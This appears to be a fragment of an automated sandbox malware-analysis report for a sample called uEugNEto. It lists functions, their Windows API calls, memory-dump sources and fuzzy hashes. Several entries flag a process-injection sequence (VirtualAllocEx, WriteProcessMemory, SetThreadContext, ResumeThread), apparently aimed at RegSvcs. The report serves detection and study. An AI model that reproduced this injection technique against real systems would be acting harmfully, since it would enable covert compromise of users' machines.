                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0157B17E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 5011c871b76e29649283c1407e6999ff8a24cbbf2d21396df448d4d66cc2fca3
                                                              • Instruction ID: 06195763a33991da3548c41b8efaee0f7cc8ee4017bd1ef30c42617d3475a823
                                                              • Opcode Fuzzy Hash: 5011c871b76e29649283c1407e6999ff8a24cbbf2d21396df448d4d66cc2fca3
                                                              • Instruction Fuzzy Hash: 02817870A00B058FE725CF2AE45579ABBF1FF88304F04892ED09ADBA50D735E849CB91
                                                              Function 0157590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015759C9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: af29024bb383292ce7a765d64673177939b7b7d779ce8f07210a3cb67a46a106
                                                              • Instruction ID: 3869455e2141592f0e6a9c9820e530a93628dc269b570de7b569bcf57ca21e22
                                                              • Opcode Fuzzy Hash: af29024bb383292ce7a765d64673177939b7b7d779ce8f07210a3cb67a46a106
                                                              • Instruction Fuzzy Hash: DB41DF71C0172DCBEB24DFAAC885B8DBBF5BF49314F20816AD408AB251DB756946CF90
                                                              Function 0157449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 015759C9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 4b3f82fc0b51ad6ed989c87f96fdb90b7a14ec220710168eade55fae59359045
                                                              • Instruction ID: 9e6965ef40d27c8a535e67a337a90b58bca2ed85401d749046f446309f8f6b18
                                                              • Opcode Fuzzy Hash: 4b3f82fc0b51ad6ed989c87f96fdb90b7a14ec220710168eade55fae59359045
                                                              • Instruction Fuzzy Hash: B441F271C0072DCBEB24DFA9C885B8DBBF5BF49304F20816AD408AB251DBB56946CF90
                                                              Function 073AD9F8 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073ADA90
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 625fca3aede0fe32518a32afb4e7b5860c6800a2bff1fe2e43d2caf350666630
                                                              • Instruction ID: 495814117909ca27111b43e1dcf944f00c68a5f4dba45f79b623911040f1c50d
                                                              • Opcode Fuzzy Hash: 625fca3aede0fe32518a32afb4e7b5860c6800a2bff1fe2e43d2caf350666630
                                                              • Instruction Fuzzy Hash: 442148B5D003499FDB10DFA9D845BDEBBF5FF48310F50882AE959A7240D7799940CBA0
                                                              Function 073847BC Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07385D3D,?,?), ref: 07385DEF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528172425.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7380000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 21617b5b0611df690975c1654b309ca76c63263ec6f105f40b8b876100ec366f
                                                              • Instruction ID: 671e916b8ce1a672573dfbf6ac43b5c4a89afcf59a54e6958abbea1e206f0994
                                                              • Opcode Fuzzy Hash: 21617b5b0611df690975c1654b309ca76c63263ec6f105f40b8b876100ec366f
                                                              • Instruction Fuzzy Hash: 5731C5B5D003499FDB10DF9AD884A9EFBF5FB48310F14842AE919A7310D775A954CFA0
                                                              Function 07385D50 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07385D3D,?,?), ref: 07385DEF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528172425.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_7380000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DrawText
                                                              • String ID:
                                                              • API String ID: 2175133113-0
                                                              • Opcode ID: 9690d69aa288c0d3312c5e327f5743cebd80f8b4e24c67d91cd6e0d073fe9936
                                                              • Instruction ID: f98ed29b62596befafbd1fc41559591371ed012cc9121eee89cc00620adbd75a
                                                              • Opcode Fuzzy Hash: 9690d69aa288c0d3312c5e327f5743cebd80f8b4e24c67d91cd6e0d073fe9936
                                                              • Instruction Fuzzy Hash: CC31E2B6D0030A9FDB10DF99D884ADEBBF5BB48320F14842AE819A7210D774A954CFA0
                                                              Function 0157D808 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0157D897
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 28dc71ef66cfbd88e4a416834939f54da1f2b60bf117c388030fa9c23c4ccedf
                                                              • Instruction ID: 69d72dbcdb0f4305e75bf07b5c4204f08c1ce9bc4d1fbc81c9f1eb2c772deb14
                                                              • Opcode Fuzzy Hash: 28dc71ef66cfbd88e4a416834939f54da1f2b60bf117c388030fa9c23c4ccedf
                                                              • Instruction Fuzzy Hash: D53125B5C002499FDB10CFAAD885ADEBFF4EF49320F14851AE958A7250D378A941CF61
                                                              Function 073ADA00 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073ADA90
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 044d6db88e361660736c44a9ab0c27d5acd3c417f74b42986b9a5f84a0fc5fe0
                                                              • Instruction ID: 80ed0b0bc06f7f38658a7178e7f6365b27c3cb6cbf784ce2452df7a03dc7c65c
                                                              • Opcode Fuzzy Hash: 044d6db88e361660736c44a9ab0c27d5acd3c417f74b42986b9a5f84a0fc5fe0
                                                              • Instruction Fuzzy Hash: 352126B5D003499FDB10DFAAC881BDEBBF5FF48310F50842AE959A7240D7799940CBA4
                                                              Function 073AD429 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073AD4AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: af63903d9ee386e0cbc0179a9a81ab6af718f825093606fd3b1fadbdb672e454
                                                              • Instruction ID: faa9bdc54ec2aca43a412dcefbaea33b887048803d493b814121e0211c9aeef1
                                                              • Opcode Fuzzy Hash: af63903d9ee386e0cbc0179a9a81ab6af718f825093606fd3b1fadbdb672e454
                                                              • Instruction Fuzzy Hash: EB2138B1D003099FDB10DFAAC4857EEBBF5EF48324F54842AD559A7240CB78A945CFA4
                                                              Function 073ADEE8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073ADF70
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 3dd5a7766200360e6a6f94fa5a3e404df852b36d85d8f2b7d45a4e650b48f94d
                                                              • Instruction ID: eaa73431481f883d257b1c51637b43877401bcc97efc9af7f359f63099727a1f
                                                              • Opcode Fuzzy Hash: 3dd5a7766200360e6a6f94fa5a3e404df852b36d85d8f2b7d45a4e650b48f94d
                                                              • Instruction Fuzzy Hash: C72148B1D003499FDB10DFAAC841BEEBBF5FF48310F50842AE918A7640C7399941CBA4
                                                              Function 073AD430 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073AD4AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 53dd2269146147a24efedefae5a8052d1f44017b514ddb86e42385b3e98e1bbd
                                                              • Instruction ID: 54136fee039e96ed538a035f49a62fc9ca14cea54aee583e2f0c4f4a823874fd
                                                              • Opcode Fuzzy Hash: 53dd2269146147a24efedefae5a8052d1f44017b514ddb86e42385b3e98e1bbd
                                                              • Instruction Fuzzy Hash: 082147B1D003099FDB10DFAAC485BEEBBF4EF48324F54842AD559A7240CB78A945CFA4
                                                              Function 073ADEF0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073ADF70
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 88099b790b976137bcce9352c6c633ab4394ec90fcb98c488b57ea9f532d7ce7
                                                              • Instruction ID: 9094a78d73d4c57d1c466c0a2941a914d58d5cb57f81ad273dbf9b60f06a28d5
                                                              • Opcode Fuzzy Hash: 88099b790b976137bcce9352c6c633ab4394ec90fcb98c488b57ea9f532d7ce7
                                                              • Instruction Fuzzy Hash: A32125B1D013499FDB10DFAAC881BEEBBF5FF48310F50842AE958A7240C7399901CBA4
                                                              Function 0157D810 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0157D897
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 66f71597cfe81a6f084e7e9c6b3c5644ef6e696d62a304b59501302a797dba04
                                                              • Instruction ID: dfaad54bf79f4aef4597d5e74f24d7a0aaf16c47a22becbb54e7522ba62f99a4
                                                              • Opcode Fuzzy Hash: 66f71597cfe81a6f084e7e9c6b3c5644ef6e696d62a304b59501302a797dba04
                                                              • Instruction Fuzzy Hash: 3C21E4B5D002089FDB10CF9AD885ADEBBF8FB48310F14841AE958A7350D378A940CF60
                                                              Function 073AD938 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073AD9AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: b129655d53d1cdbb22759d1021a6dcb257896d07259838901040c6059706d6ec
                                                              • Instruction ID: e74e784d176bf3b9112ea1dc451f4b20164053bb6e2b799c0bf8c91a25100cad
                                                              • Opcode Fuzzy Hash: b129655d53d1cdbb22759d1021a6dcb257896d07259838901040c6059706d6ec
                                                              • Instruction Fuzzy Hash: 68116775900349AFDB20DFAAC845BDEBFF5EB48320F10841AE559A7240CB35A541CBA1
                                                              Function 073AD378 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 3933936acca5ae2fe42f2a0f08d0871b1f270fffb30a52b2abf292c46bcf5964
                                                              • Instruction ID: 5d87243f9396596fdb80144a5654005624b0fab5a3d56f2ae8a7cf32cec55bb4
                                                              • Opcode Fuzzy Hash: 3933936acca5ae2fe42f2a0f08d0871b1f270fffb30a52b2abf292c46bcf5964
                                                              • Instruction Fuzzy Hash: 971158B1D003499FDB24DFAAD4457DEFBF5EB88220F24841AD419A7240CB75A941CF94
                                                              Function 073AD940 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073AD9AE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: b8e5e957bd792ba8ff94468309024696ef68e6a787de0af9f0ff80e64f9043a5
                                                              • Instruction ID: 2828b70d8f085b331850d57fc33cd68a9996267f9ecb9b0feadddac35847c82a
                                                              • Opcode Fuzzy Hash: b8e5e957bd792ba8ff94468309024696ef68e6a787de0af9f0ff80e64f9043a5
                                                              • Instruction Fuzzy Hash: C0113775D003499FDB20DFAAC845BDEBBF5EF48324F148819E559A7250CB75A940CFA0
                                                              Function 073AD380 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1528313301.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_73a0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 6a00876c4371402198bf1a433a9c6ca737b8aa20005014db3cdde3c4823ef3e3
                                                              • Instruction ID: 6df2f9806510f412746843057d2c8399d9d9c9bd55e76be42d99c8daedd402c3
                                                              • Opcode Fuzzy Hash: 6a00876c4371402198bf1a433a9c6ca737b8aa20005014db3cdde3c4823ef3e3
                                                              • Instruction Fuzzy Hash: CF113AB1D003498FDB24DFAAC4457DEFBF5EB88324F14841AD519A7640CB75A941CF94
                                                              Function 0157B118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0157B17E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1521420011.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_1570000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 0fc48eec83293d54c3d1a97e0d09604066fd5610418c8bc88ce26df633303372
                                                              • Instruction ID: 8e75a794ea395ea79617dc83294b447b031549ef485c6a7cd1254cc19410cb6c
                                                              • Opcode Fuzzy Hash: 0fc48eec83293d54c3d1a97e0d09604066fd5610418c8bc88ce26df633303372
                                                              • Instruction Fuzzy Hash: 5111DFB5C003498FDB24DF9AE845A9EFBF4EB88224F10842AD529A7210C379A545CFA1
                                                              Function 0BFB1841 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BFB18A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1530340710.000000000BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_bfb0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 64be49075fc84cffea5a9e492f1246f4e2f8badf6828b2536b5b0c7a6357a08d
                                                              • Instruction ID: 0b343a1c7bcab61af8cf6f2ff098c3e578e02eb6a004b42e6862290fc7e7aad7
                                                              • Opcode Fuzzy Hash: 64be49075fc84cffea5a9e492f1246f4e2f8badf6828b2536b5b0c7a6357a08d
                                                              • Instruction Fuzzy Hash: FF11F2B5C103499FDB20DF9AD945BDEBBF8EB48324F10841AE958A3610C375A944CFA1
                                                              Function 0BFB1848 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0BFB18A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1530340710.000000000BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_bfb0000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: dfb925b4e0e889a38a759e9a0d592029b3044d4fddb41d8602676e1839723c20
                                                              • Instruction ID: e66aca3743ab3f9eb73ef6516547b588ab9debb605b623cd1f8dcaa92c7f7013
                                                              • Opcode Fuzzy Hash: dfb925b4e0e889a38a759e9a0d592029b3044d4fddb41d8602676e1839723c20
                                                              • Instruction Fuzzy Hash: 2111D0B5C103499FDB20DF9AD985BDEBBF8FB48324F10841AE958A7250C375A944CFA1
                                                              Function 0130D3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499827662.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_130d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 304d8e635cd95b627c5df5bf6ec4922e0400f4fd97fdfa49aa2a9cedb5718536
                                                              • Instruction ID: 2f97a48e1a019244e167ad14aa752ddda2c023da7d4881deaba19c118d85b426
                                                              • Opcode Fuzzy Hash: 304d8e635cd95b627c5df5bf6ec4922e0400f4fd97fdfa49aa2a9cedb5718536
                                                              • Instruction Fuzzy Hash: 41213671504204DFDB06DF84D9C0B56BFE5FB84328F20C169E9091F286C736E446CAA2
                                                              Function 0131D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58e2d88f8825776f1c5ca68f0d3ce7ce3e4a87b13f5dc477b94a40d6fd83ef53
                                                              • Instruction ID: 6e96edccf25bb2d83e53acd64dafc180e3149262c6af48b61d463d540ad20adc
                                                              • Opcode Fuzzy Hash: 58e2d88f8825776f1c5ca68f0d3ce7ce3e4a87b13f5dc477b94a40d6fd83ef53
                                                              • Instruction Fuzzy Hash: 11213771604304DFDB09DF94D9C8B55BBA5FB85328F20C66DD8094B74AC336D407CA61
                                                              Function 0131D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cee1e3b0f27b443604a652f349a3b20267c200db05408df198a0cdf28b0d783
                                                              • Instruction ID: 222d2f6dc99044c0cb58f609753e1f44d246ee300d04bcb2b1c8aa555b8ca840
                                                              • Opcode Fuzzy Hash: 3cee1e3b0f27b443604a652f349a3b20267c200db05408df198a0cdf28b0d783
                                                              • Instruction Fuzzy Hash: D7212275604304DFDB19DF54D9C8B16BB65FB85318F20C5ADD80A0B78AC33AD847CA62
                                                              Function 0130D3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499827662.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_130d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction ID: 2a792ba2cb50d614b27d847fe70a7a89c9d362176cb21411900f0c365c2302a1
                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction Fuzzy Hash: EA112676504240CFCB06CF84D5C0B56BFB2FB84324F24C2A9D8090B297C33AE456CBA1
                                                              Function 0131D017 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction ID: 029fec2d5ed500ed2f90791a1e0528b82228c57a7c50dc73eee1b9cbbb5cc31f
                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction Fuzzy Hash: 3611BE75504280CFCB16CF58D5C4B15BB62FB45318F24C6A9D8494B65AC33AD44ACB62
                                                              Function 0131D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1499949794.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_131d000_uEugNEto.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction ID: cda1789979a0bea2e3b1a3e2944deca6ea913c275ab15580154e85512fc57d44
                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction Fuzzy Hash: A611BB75504280DFCB0ACF58C5C4B55BBB2FB85328F24C6ADD8494B69AC33AD40ACB61

                                                              Execution Graph

                                                              Execution Coverage:0.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:5
                                                              Total number of Limit Nodes:1
                                                              execution_graph 62628 1402b60 LdrInitializeThunk 62631 1402c00 62633 1402c0a 62631->62633 62634 1402c11 62633->62634 62635 1402c1f LdrInitializeThunk 62633->62635

                                                              Executed Functions

                                                              Function 01402C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 1402c0a-1402c0f 1 1402c11-1402c18 0->1 2 1402c1f-1402c26 LdrInitializeThunk 0->2
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(0141FD4F,000000FF,00000024,014B6634,00000004,00000000,?,-00000018,7D810F61,?,?,013D8B12,?,?,?,?), ref: 01402C24
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1e320a9ea66599f702d2d6d06155f93e89861376777ee25ace27e05de27ef9de
                                                              • Instruction ID: f7ae57726dff1accf26e7671f30ec185056b83aacb99261c53af988e5ef58f91
                                                              • Opcode Fuzzy Hash: 1e320a9ea66599f702d2d6d06155f93e89861376777ee25ace27e05de27ef9de
                                                              • Instruction Fuzzy Hash: BBB09B729455C5C6DA12E764460CB17790077D1741F15C077D3030697F8778C1D1E275
                                                              Function 01402B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4 1402b60-1402b6c LdrInitializeThunk
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(01430DBD,?,?,?,?,01424302), ref: 01402B6A
                                                              Memory Dump Source
